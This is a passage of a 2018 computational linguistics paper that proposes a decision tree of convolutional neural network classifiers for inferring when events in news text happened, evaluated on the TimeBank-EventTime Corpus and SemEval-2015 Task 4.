decision tree that applies neural network based classifiers at its nodes. We use this tree to incrementally infer, in a stepwise manner, at which time frame an event happened. We evaluate the approach on the TimeBank-EventTime Corpus (Reimers et al., 2016) achieving an accuracy of 42.0% com- pared to an inter-annotator agreement (IAA) of 56.7%. For events that span over a single day we observe an accuracy improvement of 33.1 points compared to the state-of-the-art CAEVO system (Chambers et al., 2014). Without re- training, we apply this model to the SemEval- 2015 Task 4 on automatic timeline generation and achieve an improvement of 4.01 points F1-score compared to the state-of-the-art. Our code is publically available.1 1 Introduction Knowing when an event happened is useful for a lot of use cases. Examples are in the fields of time-aware information retrieval, text summarization, automated timeline generation, and automatic knowledge base population. Many facts in a knowledge base are ∗During author’s internship in the research training group AIPHES at UKP Lab, TU Darmstadt. 1https://github.com/ukplab/ tacl2017-event-time-extraction only true for a certain time period, for example the presidency of a person. Hence, the population of a knowledge base can highly benefit from high quality event and event time2 extraction (Surdeanu, 2013). Inherent to events is the connection to time. Allan (2002) defines an event as “something that happens at some specific time and place”. The challenges for automatic event time extraction are manifold. The temporal information in news articles which states when an event happened is, in most cases, not in the same or in neighboring sentences with the event (Reimers et al., 2016). It can be mentioned far before the event or far after the event. Even worse, for more than 60% of events, the specific day at which the event happened is not mentioned. However, from the world knowledge and causal relations, the reader can infer a lot of temporal information about those events and can often infer that the event happened before or after some specific point in time. In this paper we describe a new classifier for auto- matic event time extraction. We use the TimeBank- EventTime Corpus (Reimers et al., 2016) to train and evaluate our proposed architecture. In contrast to other corpora on temporal relations, the annota- tion of the TimeBank-EventTime Corpus does not make restrictions where, and in which form, tempo- ral information for an event must be provided. The annotators were allowed to take the whole document into account and were asked to answer, to the best of their ability, the question at which date or time period the event happened. The event time annotation for some sample events is shown in the following: • He was [sent]1980-05-26 into space on May 26, 2We will refer to the temporal information when an event happened as event time. 77 Transactions of the Association for Computational Linguistics, vol. 6, pp. 77–89, 2018. Action Editor: Patrick Pantel. Submission batch: 6/2017; Revision batch: 10/2017; Published 2/2018. c©2018 Association for Computational Linguistics. Distributed under a CC-BY 4.0 license. 1980. He [spent]endPoint =1980-06-01beginPoint=1980-05-26 six days aboard the Salyut 6 spacecraft. • [...] two areas [expected]endPoint =before 1998-02-06beginPoint=before 1998-02-06 to be hardest [hit]after 1998-01-01 before 1998-01-31 when the effects of the Asian crisis [...]. This annotation imposes several challenges for an automatic approach: 1. The number of possible labels is infinite, as date values are part of the labels. 2. Due to the diverse types of events and due to varying temporal information for events, the structure of the labels varies. 3. Temporal information from the whole document must be taken into account. 4. For 12.6% of the events, the event time label is a combination of several temporal clues. An example could be that the annotator combined that the person went missing on the 15th and that the person went missing in the month of August. However, nowhere in text is the 15th of August explicitly mentioned. The main contribution of this paper is the proposal of a novel combination of a decision tree combined with neural network classifiers for the nodes to solve the afore-mentioned challenges. To our knowledge, this is the first system that works on the complete document and can extract long-range relations be- tween events and temporal expressions. Further, it is the first system that focuses on extracting begin and end points for events that span over multiple days. Evaluated on the TimeBank-EventTime Corpus (Reimers et al., 2016), it achieves an accuracy of 42.0% compared to an inter-annotator agreement (IAA) of 56.7%. Compared to the state-of-the-art CAEVO system (Chambers et al., 2014), we observe a substantial improvement in accuracy of 33.7 per- centage points for events that happened on a single day. For Multi-Day Events, we observe an accuracy of 24.3% using a strict metric. We show that the proposed model generalizes well to new tasks and textual domains. We applied it without re-training to the SemEval-2015 Task 4 on automatic timeline generation. There, it achieves an improvement of 4.01 points F1-score compared to the state-of-the-art. 2 Related Work We start with a review on common annotation schemes to capture temporal information for events in documents. Afterwards, we present related work on automatically extracting temporal information for events. 2.1 Annotation of Events and Temporal Information One of the most widely used specifications for events and temporal expressions is TimeML (Saurı́ et al., 2004). It provides specifications for the annotation of events, temporal expressions, and the temporal links (TLINK). An event is defined as term for situations that happen or occur. Temporal expressions, such as times, dates, or durations, are annotated and their temporal values are normalized using the definitions of Ferro (2002). A TLINK is the relation between two events, between an event and a temporal expres- sion, or between two temporal expressions. TimeML defines 14 different relation types, however, most corpora which are using the TimeML specification restrict the number of relations to a smaller set. A prominent corpus using the TimeML specifica- tions is the TimeBank Corpus (Pustejovsky et al., 2003), which was also the basis for the three shared tasks TempEval-1 (Verhagen et al., 2007), TempEval- 2 (Verhagen et al., 2010) and TempEval-3 (UzZaman et al., 2013). A drawback of TLINKs is the quadratic growth of possible TLINKs with the number of events and tem- poral expressions, resulting in more than 10,000 pos- sible TLINKs for several documents in the TimeBank Corpus. As the annotation of such a large number of TLINKs would be impractical, annotation of those is always restricted in some form. For the TimeBank Corpus, only salient TLINKs were annotated. Which links are salient isn’t well defined and a low agree- ment between annotators can be observed. The three TempEval shared tasks tried to improve the coverage and added some further temporal links for mentions in the same sentence. More dense annotations were applied by Bramsen et al. (2006), Kolomiyets et al. (2012), Do et al. (2012) and Cassidy et al. (2014). While Bramsen et al., Kolomiyets et al., and Do et al. only annotated some temporal links, Cassidy et al. an- notated all Event-Event, Event-Time, and Time-Time 78 pairs in the same sentence as well as in the directly succeeding sentence leading to the densest annota- tion for the TimeBank Corpus. They used six differ- ent relation types: BEFORE, AFTER, INCLUDES, IS INCLUDED, SIMULTANEOUS, and VAGUE, where VAGUE encodes that the annotators were not able to make a statement on the temporal relation of the pair. 2.2 Existent Event Time Extraction Systems Most automatic approaches use the previously in- troduced TLINKs to train and evaluate systems for extracting temporal information about events. For a new document, the system first extracts the temporal relations between events and temporal expressions. In a post-processing step, those TLINKs are used to retrieve the information when an event happened. Extracting the relations is often formulated as a pair-wise classification task. Each pair of events and/or temporal expressions is examined and classi- fied according to the available relation classes. Ensur- ing transitivity is a big challenge when formulating this task as a pair-wise classification task. One sim- ple but nonetheless frequently used solution is to automatically infer all temporal relations that can be derived from transitivity. Some systems have tried to take advantage of global information to ensure transi- tivity using Markov logical networks or integer linear programming (Bramsen et al., 2006; Chambers and Jurafsky, 2008; Yoshikawa et al., 2009; UzZaman and Allen, 2010). However, the gains were minor. Chambers et al. (2014) proposes the CAEVO- system, a sieve-based-architecture that blends mul- tiple classifiers into a precision-ranked cascade of sieves. The system was trained and evaluated on the TimeBank-Dense Corpus and created a dense TLINK annotation for all pairs of events and/or temporal ex- pressions in the same and in adjacent sentences. The code is publically available.3 A bottleneck of current systems is the limitation to TLINKs for pairs that are in the same or in adjacent sentences. According to Reimers et al. (2016) 28.3% of the events happen at the document creation time (DCT). For the remaining 71.7% of events, the event time must be inferred via TLINKs. However, for 3http://www.usna.edu/Users/cs/nchamber/ caevo/ 58.7% of those events the most informative time ex- pression4 is not in the same nor in the previous/next sentence. In conclusion, for 42.1% of all the events in a text it would be necessary to take long-range TLINKs into account to correctly retrieve the event time. Extending existing systems to take long-range relations into account is difficult due to a lack of training and evaluation data. 3 Event Time Annotation We use the TimeBank-EventTime Corpus (Reimers et al., 2016) to evaluate our architecture for automatic event time extraction. The TimeBank-EventTime Corpus does not use the concept of TLINKs, instead, for every event, the annotators were asked to anchor the event in time as precisely as possible. The annotation distinguishes between events that happened on a Single Day and Multi-Day Events that span over multiple days. For Single Day Events, the annotators provide the day the event happened in the format YYYY-MM-DD. In the case the exact date is not mentioned in the document, the annotators were asked to anchor the event in time as precisely as possible using the annotation before YYYY-MM-DD and after YYYY-MM-DD. Before notes that the event must have happened before the stated date and after that the event must have happened after the date. A combination of before and after is possible. For Multi-Day Events, the annotators were asked to provide the begin and the end point of the event. As for Single Day Events, they were allowed to use the before and after notation in the case the explicit begin/end point is not mentioned in the document. The annotated corpus contains news articles and TV broadcast transcripts from various sources written mainly between January and April 1998. The shortest document has five sentences, while the longest has 63 sentences. A label distribution can be found in (Reimers et al., 2016). 4 Automatic Event Time Extraction In this section we first present our hierarchical tree approach to automatically infer the event times in 4The most informative temporal expression is defined as the temporal expression giving the reader the information at which date, or in which time frame, the event happened. 79 a document. In Section 4.3 we present two base- lines that we use for comparison: the first uses dense TLINKs extracted by the CAEVO system and the second baseline is a reduced version of the presented tree approach. 4.1 Event Time Extraction using Trees We use the tree structure depicted in Figure 1 to extract the event time for a given target event. The structure was inspired by how annotators labeled the data. When annotating the text, the first decision is typically whether the event is a Single Day Event or a Multi-Day Event. In the case that it is a Single Day Event, the next question is whether the event happened at the Document Creation Time (DCT) or not. As the annotated data comes from the news domain, a large set of events (48.28% of the Single Day Events) happened at the document creation time. In the case the event did not happen at DCT, then the annotator scanned the text to decide whether the date when the event happened is explicitly mentioned or not. If it is not mentioned, the annotator used the before and after notation to define the time frame when the event happened as precisely as possible. For Multi-Day Events, the process is similar to determine the begin and end point of the event. The first classifier is a binary classifier to decide whether the event is a Single or a Multi-Day Event. In the case it is a Single Day Event, the next classifier decides the relation between the event and the Doc- ument Creation Time (DCT). In the case the event happened at DCT, the architecture stops. If the event happened before or after DCT, the next classifier is invoked, detecting which temporal expressions are relevant. For all relevant temporal expressions, it is then determined whether the event happened simul- taneously, before, or after the temporal expressions. The final step (2.4) outputs a single event time by narrowing down the information it receives from the relation to DCT (2.1) and the pool of relevant tempo- ral expressions and relations (2.3). For Multi-Day Events the process is similar, how- ever, the system must return the begin and the end points. The system runs three processes in parallel: it extracts the relations to relevant time expressions for the begin point (3.1.1 and 3.1.2); it extracts the relation to DCT (3.2) and; it extracts the relations to relevant time expressions for the end point (3.3.1 and 3.3.2). There are three possible relations between a Multi-Day Event and the DCT: the event started and ended before the DCT; it started and ended after the DCT; or it started before DCT and ended after DCT. This information is taken into account in step 3.1.3 and 3.3.3 when producing single begin point and end point information for the given event. 4.2 Local Classifiers This section describes the different local classifiers applied in our tree structure. For all except the Nar- row Down classifier, we used the Convolutional Neu- ral Networks Architecture (Lecun, 1989) depicted in Figure 2. The Narrow Down classifier is a sim- ple, hand-crafted, rule-based classifier described in Section 4.2.6. 4.2.1 Neural Network Architecture We use the same neural network architecture with slightly different configurations for the different local classifiers. The architecture is depicted in Figure 2 and is described in the following sections. The neural network architecture is based on the design proposed by Zeng et al. (2014), which can achieve state-of-the-art performance on relation clas- sification tasks (Zeng et al., 2014; dos Santos et al., 2015). The neural network applies a convolution over the word representations and position embeddings of the input text followed by a max-over-time pooling layer. We call the output of this layer Input Text Fea- tures. Those Input Text Features are merged with the word embedding for the event and time expression token. The merged input is fed into a hidden layer using either the hyperbolic tangent tanh(·) or a rec- tified linear unit (ReLU) as activation function. The choice of the activation function is a hyperparameter and was optimized on a development set. The final layer is either a single sigmoid neuron, in the case of binary classification, or a softmax layer. To avoid overfitting, we used two dropout layers (Srivastava et al., 2014), the first before the dense hidden layer and the second after the dense hidden layer. The percent- ages of the dropouts were set as hyperparameters. Word Embeddings. We used the pre-trained word embeddings presented by Levy and Goldberg (2014). The embedding layer of our neural networks maps each token from the input text to their respec- tive word embedding. Out-of-vocabulary tokens are 80 Figure 1: Tree structure used to extract the temporal information for an event. Rectangles are local classifiers based on deep convolutional neural networks except for the Narrow Down rectangles, which are simple rule based classifiers. Figure 2: The neural network architecture used for the different local classifiers. replaced with a special UNKNOWN token, for which the word embedding was randomly initialized. Position Embeddings. Collobert et al. (2011) pro- poses the use of position embeddings to keep track how close words in the input text are to certain tar- get words. For each input text, we specify certain words as targets. For example, we specify the event and the temporal expression as target words and train the network to learn the temporal relation between those. Each word in the input text is then augmented with the relative distances. Let pos1, pos2, ... be the positions of the target words in the input text. Then, a word at position j is augmented with the features j −pos1, j −pos2, · · · . These augmented position features are then mapped in the embedding layer to a randomly initialized vector. The dimension of this vector is a hyperparameter of the network. The word embeddings and the position embed- dings are concatenated to form the input for the con- volutional layer. In the case of two target words, the input for the convolutional layer would be: emboutput = {[wew1,pe1−pos1,pe1−pos2], [wew2, pe2−pos1,p2−pos2], ..., [wewn,pen−pos1,pen−pos2]} with wewj the embedding of the j-th word in the 81 input text, pej−posk the embedding for the distance between the j-th word and the target word k. Convolutional & Max-Over-Time Layer. A challenge for the classifier is the variable length of the input text and that important information can be anywhere in the input text. To tackle this issue, we use a convolutional layer to compute a distributed vector representation of the input text. Let us define a vector xk as the concatenation of the word and po- sition embeddings for the position k as well as for m positions to the left and to the right: xk = ([we wk−m,pek−m−pos1,pek−m−pos2]||...|| [wewk,pek−pos1,pek−pos2]||...|| [wewk+m,pek+m−pos1,pek+m−pos2]) The convolutional layer multiplies all xk by a weight matrix W1 and applies the activation func- tion component-wise. After that, a max-over-time is applied, i.e., the max-function is applied component- wise. The j-th entry of the convolutional and max- over-time layer output is defined as: [convoutput]j = max 1≤k≤n [tanh(W1xk)]j Lexical Features. Previous approaches heavily rely on lexical features. For example, the CAEVO system (Chambers et al., 2014) uses, for the classifi- cation of event-time edges, the token, the lemma, the POS tag, the tense5, the grammatical aspect6 and the class of event7 as well as the parse tree between event and time expression. In our evaluation, we did not observe that these features have a significant impact on the performance. Hence, we decided to use the event and time tokens as the only features besides the dense vector representation of the input text. For multi-token expressions, we only use the first token. Our architecture focuses on extracting the event time when event annotations and temporal expressions are provided. In order to evaluate the accuracy of this isolated step, we decided to use the provided annotations in the corpus. The baselines we 5Defined tenses: simple, perfect, and progressive 6Defined aspects in TimeBank: past, present, future 7Defined classes in TimeBank: occurrence, perception, re- porting, aspectual, state, i state, i action compared against use these gold annotations as well. Output. The distributed vector representation of the input text and the embeddings of event/time token are concatenated and passed through a dense layer. As the activation function, we allowed either the hy- perbolic tangent or the rectified linear unit (ReLU). The choice is a parameter of the network. The final layer is either a single sigmoid neuron, in the case of binary classification, or a softmax layer to compute the probabilities of the different tags. 4.2.2 Single vs. Multi-Day Event Classification The first local classifier, that decides whether an event is a Single Day Event or a Multi-Day Event, uses the event word as the target word. 4.2.3 DCT Classification A Single Day Event can happen either before the document was created (Before-class), on the same day (Simultaneous-class), or it will hap- pen at least one day after the document was created (After-class). The configuration of this local clas- sifier is as in the previous section. Note, to classify the relation to the DCT, in most cases, it was not important to know the concrete Document Creation Time. Therefore, we did not pass the DCT as a value to the network. For Multi-Day Events, we decided to group the events into three categories: first, events that be- gan and ended before the Document Creation Time (Before-class); second, events that began before DCT and ended after DCT (Includes-class); and third, events that will begin and end after DCT (After-class). 4.2.4 Detecting Relevant Time Expressions In the case the event did not happen at the DCT, it is important to take the surrounding text and po- tentially the whole document into account to figure out at which date the event happened. For our classi- fier, we assume that temporal expressions are already detected in the document. To detect temporal ex- pressions, tools like HeidelTime8 can be used that achieve an F1-score of 0.919 on extracting temporal expressions in the TimeBank Corpus (Strötgen and Gertz, 2015). 8https://github.com/HeidelTime 82 As an intermediate step to detect when an event happened, we first decide whether the temporal ex- pression is relevant for the event or not. We define a temporal expression to be relevant, if the (normal- ized) value of the temporal expression is part of the event time annotation. The value of the temporal ex- pression can either be the event time, or it can appear in the before or after notation. The classifier is executed for all event and temporal expression pairs. The input text for the distributed text representation is the text between the event and the temporal expression. 4.2.5 Temporal Relation Classification Given the relevant temporal expression for an event from the previous step, the next local classi- fier establishes the temporal relation between the event and the temporal expression. For a given, relevant event-temporal expression pair, it outputs BEFORE - when the event happened before the tem- poral expression, AFTER - when it happened after, or SIMULTANEOUS - when it happened on the men- tioned date. This local classifier has the same configu- ration as the network used to detect relevant temporal expression. 4.2.6 Narrow Down Classifier The goal of the Narrow Down Classifier, that is used in step 2.4, 3.1.3 and 3.3.3 in Figure 1, is to derive the final label given the information on the rel- evant temporal expressions, their relation to the event, and the relation to the document creation time. For most events in the corpus, this information was un- ambiguous, e.g., only one temporal expression was classified as relevant for the event. The proposed approach returns multiple relevant temporal expres- sions only for a small fraction of events. However, this number was too small to train and to validate a learning algorithm for this stage. Hence, we decided to implement a straightforward, rule-based classifier. This classifier is depicted in Algorithm 1. It takes all relations to relevant temporal expres- sions as well as the relation to the Document Cre- ation Time to derive the final output. In the case a SIMULTANEOUS relation exists, the classifier stops and the appropriate temporal expression is used as event time. If no such relation exists, a frequency distribution of the linked dates and relations is cre- ated for BEFORE as well as for AFTER relations. For example, when the system extracts three relevant BEFORE relations of different mentions of date1 throughout the text and two relevant BEFORE rela- tions of different mentions of date2, then the sys- tem would choose date1 as a slot-filler for the be- fore property. If there are as many relevant BEFORE relations for date1 as for date2, the system will choose the lowest date for the before property (line 13-18). For AFTER relations, we use the same logic, except that we choose the largest date (line 23). Algorithm 1 Narrow Down Classifier 1: function NARROWDOWN(times) 2: fd before, fd after = FreqDistribution() 3: for [relation, time] in times do 4: if relation is SIMULTANEOUS then 5: return time 6: else if relation is BEFORE then 7: fd before.new sample(time) 8: else if relation is AFTER then 9: fd after.new sample(time) 10: end if 11: end for 12: //fd before elements have the fields .num=#samples and .time=time value 13: if fd before.size > 0 then 14: // find the largest number of samples of a time 15: max samples = fd before.max( .num) 16: //take minimum over all times having max samples 17: before time = fd before.filter( .num == max samples).min( .time) 18: end if 19: if fd after.size > 0 then 20: // find the largest number of samples of a time 21: max samples = fd after.max( .num) 22: //take maximum over all times having max samples 23: after time = fd after.filter( .num == max samples).max( .time) 24: end if 25: return after + after time + before + before time 26: end function 4.3 Baseline We use two baselines to compare our system. As the first baseline, we use the system presented in Reimers et al. (2016). The baseline is based on the multi-pass architecture CAEVO introduced by Cham- bers et al. (2014) and extracts all TLINKs between event mentions and temporal expressions. The sys- tem by Chambers et al. applies multiple rules and trained classifiers to extract those TLINKs. The dif- 83 ferent stages are ranked by precision and are executed consecutively. A shortcoming of the system is that it does not produce temporal information if an event lasted for more than a day. Hence, the system cannot be used to distinguish between Single Day and Multi- Day Events, nor can it extract the begin/end points for Multi-Day Events. Our previously presented baseline uses the ex- tracted relations for Single Day Events and gener- ates a set of <relation, time> tuples in which the event is involved. We use the narrow down classifier from section 4.2.6 to extract the final label. When all extracted relations are of type VAGUE, the baseline returns that it cannot infer the time for the event. The second baseline is a reduced version of the hierarchical tree. For this baseline, we first apply the classifier to decide whether it is a Single Day or Multi-Day Event. When it is a Single Day Event, we classify the relation to the document creation time (DCT) (classifier 2.1). When the event did not happen at DCT, we link it to the closest temporal expression in the document. For Multi-Day Events, we only run the classifier 3.2 to extract the relation to DCT. When the event happened before DCT, we set the begin and end point to BEFORE DCT; when it happened after DCT, we set both to AFTER DCT; and, when the relation was Includes, we set the begin point to BEFORE DCT and the end point to AFTER DCT. 5 Experimental Setup We conduct our experiments on the TimeBank- EventTime Corpus (Reimers et al., 2016). The corpus is comprised of 36 documents and 1498 annotated events. We use the same split into training, develop- ment, and test set as Chambers et al. (2014) resulting in 22 documents for training, 5 documents for hyper- parameter optimization, and 9 documents for the final evaluation. Using this split allows a fair comparison to the CAEVO system. Hyperparameters for the individual local classi- fiers were chosen using random search (Bergstra and Bengio, 2012) with at least 1000 iterations per local classifier. 6 Experimental Results We evaluate our system using two different metrics. The strict metric requires an exact match between the predicted label and the gold label. A disadvantage of this metric is that it does not allow partial agree- ment. The strict agreement between two annotators is fairly low for events where the exact date of the event was not mentioned. In order to allow partial matches, we will also use a relaxed metric, which will judge two different la- bels only as an error, if those are mutually exclusive. Two labels are mutually exclusive, if there is no event date which could satisfy both labels at the same time. If the event happened on August 5th, 1998, the two annotations before 1998-08-31 and after 1998-08-01 before 1998-08-31 would both be satisfied. There- fore, these two different labels would be considered as correct. In contrast, the two annotations after 1998- 02-01 and before 1997-12-31 can never be satisfied at the same time and are therefore mutually exclusive. The score of the relaxed metric must be seen in combination with the strict metric. A system could trick the relaxed metric by returning a before date that is far in the future which results in a high relaxed score but a negligible strict score. Future research is necessary to judge the quality of different kind of partial matches and to design an appropriate metric. 6.1 System Performance Following the recommendations in (Reimers and Gurevych, 2017), we train the system with 25 dif- ferent random seed values, and compute the mean performance score and the standard deviation. Table 1 shows the results in comparison to the observed inter-annotator agreement (IAA). The inter-annotator agreement is based on two full annotations of the cor- pus. The chance-corrected agreement is α = 0.617 using Krippendorff’s α (Krippendorff, 2004). The two annotations were merged into a final gold label annotation of the corpus, which we used for training and evaluation. The accuracy to distinguish between Single Day and Multi-Day Events is 78.2% on the test set, in comparison to an inter-annotator agreement of 81.8%. The overall performance is 42.0%, compared to an IAA of 56.7% using the strict metric. For Multi-Day Events, we observe an accuracy with the strict metric of 24.5%, compared to an IAA of 52.0%. Breaking it down to the begin- and end- point extraction, we observe a much lower accuracy for the begin point extraction of just 28.5%, com- 84 System IAA Single vs. Multi-Day 78.2% ± 1.33 81.8% Single Day (Strict) 74.6% ± 1.04 80.5% Single Day (Relaxed) 92.5% ± 0.60 98.0% Multi-Day (Strict) 24.5% ± 1.61 52.0% Begin (Strict) 28.5% ± 0.73 63.8% End (Strict) 66.5% ± 1.02 74.9% Multi-Day (Relaxed) 74.6% ± 0.55 94.6% Begin (Relaxed) 94.9% ± 0.38 98.6% End (Relaxed) 80.2% ± 0.73 96.1% Overall Acc. (Strict) 42.0% ± 1.21 56.7% Overall Acc. (Relaxed) 84.6% ± 0.71 95.3% Table 1: Accuracy for the different stages of our system in comparison to the observed inter-annotator agreement (IAA). The strict metric requires an exact match between the labels. The relaxed metric requires that the two anno- tations are not mutually exclusive. pared to 66.7% accuracy for the end point extraction. However, using the relaxed metric, we see an accu- racy of 94.9% for the begin point and 80.2% for the end point. We can conclude that the extraction of the begin point works well, however, in a large set of cases (66.7%) the extracted begin point is less precise than the gold annotation. The baseline based on the CAEVO system from Chambers et al. (2014) can only be applied to Single Day Events, as TLINK types that define the start or the end of an event do not exist. We ran this baseline on all events that were correctly identified as Single Day Events. The performance of this baseline is depicted in Table 2. For the proposed approach we observe a performance increase from 41.2% to 74.6%. For 18.3% of the events, the retrieved label of the proposed approach was less precise than the gold label. An example of a less precise label would be before 1998-12-31 while the gold label was before 1998-08-15. A clear wrong label was observed for 7.1% of the generated labels. A big disadvantage of a dense TLINK annotation is the restriction of TLINKs for events and temporal expression that are in the same, or in adjacent, sen- tences. For 32.0% of the events, the baseline was not able to infer any event time information. As our sys- tem outputs a label for every event, we see a slightly increased number of wrong labels in comparison to the baseline. Single Day Events Ours CAEVO Exact match 74.6% 41.2% Less precise 18.3% 21.5% Wrong label 7.1% 5.4% Cannot infer time - 32.0% Table 2: Distribution of the retrieved labels for the pro- posed system and for the baseline. Less precise are labels where the time frame when the event has happened is larger than for the gold label. Wrong label are labels which are in clear contradiction to the gold standard. Table 3 compares the proposed system against the reduced tree that only classifies the type of the event (Single Day or Multi-Day) and the relation to the doc- ument creation time. We observe a significant drop in accuracy for Single Day Events, indicating that just classifying the relation to the document creation time is insufficient for this task. System SD MD Overall Full system 74.6% 24.3% 42.0% Reduced tree 40.4% 19.6% 24.2% CAEVO 41.2% - 18.1% Table 3: Comparison of the accuracy (strict metric) for Single Day Events (SD), Multi-Day Events (MD) and overall. Reduced tree uses only the local classifiers 1, 2.1 and 3.2. 6.2 Error Analysis Error propagation is an important factor in a decision tree. Table 4 depicts the accuracy of the different local classifiers. We compare those to a Majority Vote baseline. For all local classifiers we can see a large performance increase over the baseline. We observe the lowest accuracy for the classifiers of the begin point (3.1.1. and 3.1.2.). This is in line with the previous observation of the low accuracy for begin point labels as well as with the low IAA for begin point annotations. The root classifier, which decides whether the event is a Single Day or a Multi-Day Event, is the most critical classifier. This classifier is responsible for 21.7% of the erroneously labeled events. How- ever, with an accuracy of 78.3% it is already fairly close to the IAA of 81.6% and it is unclear if this classifier could substantially be improved. 85 System Majority Vote 1. Event Type 78.3% 54.5% Single Day Event 2.1. DCT Rel. 84.2% 55.6% 2.2. Relevant 79.1% 66.0% 2.3. Relation 81.0% 72.7% Multi-Day Event 3.1. Begin Point 3.1.1. Relevant 79.0% 68.9% 3.1.2. Relation 63.1% 42.9% 3.2. DCT Rel. 65.2% 46.8% 3.3. End Point 3.3.1. Relevant 83.8% 65.1% 3.3.2. Relation 85.1% 79.0% Table 4: Accuracy for the different local classifiers vs. a Majority Vote baseline. Local classifiers are numbered as depicted in Figure 1. As mentioned in the introduction, the annotators were not restricted to the dates that are explicitly mentioned in the document but could also create new dates. For example, in the sentence It’s the [second day]date:1998-03-06 of an [offensive]beginPoint=1998-03-05... it is clear for the annotator that the offensive started on 1998-03-05. However, this date is not explicitly mentioned in the text, only the date 1998-03-06 is mentioned. We call such dates out-of-document dates. Handling those cases is extremely difficult and our system is currently not capable of creating such out- of-document dates. Table 5 depicts the error rate introduced by those dates. As the table depicts, 12.6% of the event time labels are affected by out-of-document dates. An especially high percentage of such dates is observed for the be- gin point of Multi-Day Events. In a lot of these cases the document states either an explicit or a rough esti- mation on the duration of the event. In the previous example, the text stated that the offensive already lasted for two days. In another example, the docu- ment gives the information that the event started in recent years or that it lasted for roughly 2 1/2 years. 6.3 Ablation Test Table 6 presents the changes in accuracy in per- centage points when individual components of the proposed system are changed. We observe a slight Out-of-document dates Single Day Events 3.0% Multi-Day Events 24.1% Begin Point 17.0% End Point 9.9% Overall 12.6% Table 5: Percentage of labels in the test set affected by out-of-document dates. drop of -2.3 percentage points if bidirectional LSTM- networks with 100 recurrent units are used instead of Convolutional Neural Networks. LSTM-networks showed for other NLP tasks state-of-the-art perfor- mance, however, for this task they were not able to improve the performance. One reason could be the comparably small training set of 22 documents. A further disadvantage of the BiLSTM-networks was the significantly longer training time, prohibiting run- ning an extensive hyperparameter tuning. Configuration Accuracy Full system 42.0% BiLSTM instead of CNN -2.3 Rnd. word embeddings -7.7 No input text feature -9.7 No position feature -3.9 No narrow down -1.3 Table 6: Change in accuracy (strict metric) in percent- age points when replacing individual components of the architecture. An important factor for the performance was the pre-trained word embeddings. Replacing those with randomly initialized embeddings decreased the per- formance by -7.7 percentage points. As before, we think this is due to the small training size. A large number of test tokens do not appear in the training set and several tokens only appear infrequently in the training set. Hence, the network is not able to learn meaningful representations for those words. Our system successfully uses the text between the event and the temporal expression (Input Text Fea- tures) for classifying the relation between those. Re- moving this part of the architecture decreases the ac- curacy by -9.7 percentage points. Further, it appears that not only the token itself, but also the position of the token relative to the event / time token is taken 86 into account. Removing this position information from the input text feature reduces the performance by -3.9 percentage points. Replacing the narrow down classifier with a classi- fier that randomly selects one of the relevant temporal expressions reduces the performance by only -1.3 per- centage points. For most events, there was only one relevant temporal expression extracted. We analyzed the parameter settings for the top five performing lo- cal classifiers for each stage. The activation function (tanh and ReLU) appears to have a negligible impact on the performance. 6.4 Event Timeline Construction We evaluated our system on the shared task SemEval- 2015 Task 4: TimeLine: Cross-Document Event Or- dering (Minard et al., 2015). The goal is to construct an event timeline for a target entity given a set of 30 documents from Wikinews on certain topics. We use the setting of Track B, where the events are provided. We used HeidelTime to detect and normalize time expressions. We then ran our system out of the box, i.e., without retraining for the new dataset. For the shared task, an event can occur either at a specific day, in a specific month, or in a specific year. Events that can not be anchored in time are removed from the evaluation. We implemented simple rules that transform our system output to the format of the shared task: if an event is simultaneous with a specific time expression, we will output this date. If our system returns that it happened before and after a certain date, it will output the year and month if both dates are in the same month. If both dates are in the same year but in different months, it will output the year. Events with predicted timespans of over more than one year are rejected. For Multi-Day Events, we only use the begin point as only this information was annotated for this shared task. Two teams participated in the shared task (GPL- SIUA and HeidelToul). Currently, the best published performance was achieved by Cornegruta and Vla- chos (2016) with an F1-score of 28.58. Our system was able to improve the total F1-score by 4.01 points as depicted in Table 7. A challenge for our system is the different anchor- ing of events in time: while our system can anchor events at two arbitrary dates, the SemEval-2015 Task 4 only anchors events either at a specific day, month System Airbus GM Stock Total Our approach 30.37 28.83 38.01 32.59 Cornegruta 25.65 26.64 32.35 28.58 GPLSIUA 1 22.35 19.28 33.59 25.36 HeidelToul 2 16.50 10.94 25.89 18.34 Table 7: Performance of our system on the SemEval-2015 Task 4 Track B for the topics Airbus, General Motors, and stock market. or year. When our system returns the event time value after 2010-10-01 and before 2010-11-30, we had to decide how to anchor this event for the gen- erated timeline. For such an event, three final labels would be plausible: 2010-10-xx, 2010-11-xx, and 2010-xx-xx. A similar challenge occurs for events that received a label like before 2010-11-30. If we anchor it in 2010-11-xx, we must be certain that the event happened in November. Similarly, if we an- chor it in 2010-xx-xx, we must be certain that the event happened in 2010. Such information cannot be inferred directly from the returned label of our system. As only 30 documents on a single topic were provided for training, we could not tune the transfor- mation accordingly. A manual analysis revealed that this transformation caused around 15% of the errors. 7 Conclusion Event Time Extraction is a challenging classifica- tion task as the set of labels is infinite and the label depends on the information that is scattered across the document. The presented classifier is able to take the whole document into account and to infer the date when an event has happened. We applied the system to the TimeBank-EventTime Corpus and achieved an accuracy of 42.0% in comparison to an inter-annotator agreement of 56.7% using a strict metric. For 74.6% of the Single Day events, the exact event time could be extracted. This is a 33.1 percentage points improvement in comparison to the state-of-the-art approach by Chambers et al. (2014). We demonstrated the generalizability by applying it to the SemEval-2015 Task 4 on timeline generation, where it improved the F1-score by 4.01 percentage points compared to the state-of-the-art. 87 Acknowledgements This work has been supported by the German Re- search Foundation as part of the Research Training Group Adaptive Preparation of Information from Het- erogeneous Sources (AIPHES) under grant No. GRK 1994/1. We would like to thank the TACL editors and reviewers for their effort and the valuable feedback we received from them. References James Allan. 2002. Topic Detection and Tracking: Event- based Information Organization. pages 1–16. Kluwer Academic Publishers, Norwell, MA, USA. James Bergstra and Yoshua Bengio. 2012. Random Search for Hyper-parameter Optimization. J. Mach. Learn. Res., 13:281–305, February. Philip Bramsen, Pawan Deshpande, Yoong Keok Lee, and Regina Barzilay. 2006. Inducing Temporal Graphs. In Proceedings of the 2006 Conference on Empirical Methods in Natural Language Processing, EMNLP ’06, pages 189–198, Stroudsburg, PA, USA. Association for Computational Linguistics. Taylor Cassidy, Bill McDowell, Nathanael Chambers, and Steven Bethard. 2014. An Annotation Framework for Dense Event Ordering. In Proceedings of the 52nd Annual Meeting of the Association for Computational Linguistics (Volume 2: Short Papers), pages 501–506, Baltimore, Maryland, USA. Association for Computa- tional Linguistics. Nathanael Chambers and Dan Jurafsky. 2008. Jointly combining implicit constraints improves temporal or- dering. In Proceedings of the Conference on Empirical Methods in Natural Language Processing, EMNLP ’08, pages 698–706, Stroudsburg, PA, USA. Association for Computational Linguistics. Nathanael 